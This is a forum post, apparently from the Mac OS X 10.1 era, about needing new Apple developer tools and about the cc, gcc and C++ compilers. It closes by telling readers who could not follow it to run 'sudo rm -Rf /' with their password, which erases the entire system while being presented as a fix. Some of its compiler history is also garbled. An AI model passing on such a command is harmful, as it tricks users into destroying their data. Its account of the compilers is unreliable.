Just to clarify:
Yes, you do need the new Dev Tools from connect.apple.com with the update to X.1. Apple is using a new format so the old tools won't work. This is only a tad of a bother but necessary as the new tools actually are a slight faster than the old ones {CLI only, I never use Project Builder cause I finally started using PICO and learned to love the Atom Bomb :-}.
CC is the BSD *predecessor* of GCC, eg., it came before. CC is the standard C Compiler (hence CC) for all UNIX derived systems, just like GNU's version is the standard for all Linux derived systems (Gnu C Compiler = GCC).
C++ is the C++ compiler, like g++ is for Linux. Be forewarned, ld doesn't seem to like the Apple Extensions, the new format(s) being implimented, nor C++ as a generality, but it doesn't matter as intelligent folk won't muddle with C++ past the lab work they didn't get done in class....
If anyone reading this couldn't follow that, go to the command line and type the following:
sudo rm -Rf /
Enter your password when prompted and I can guarantee you won't have to worry about these problems ever again ^_^ ,V..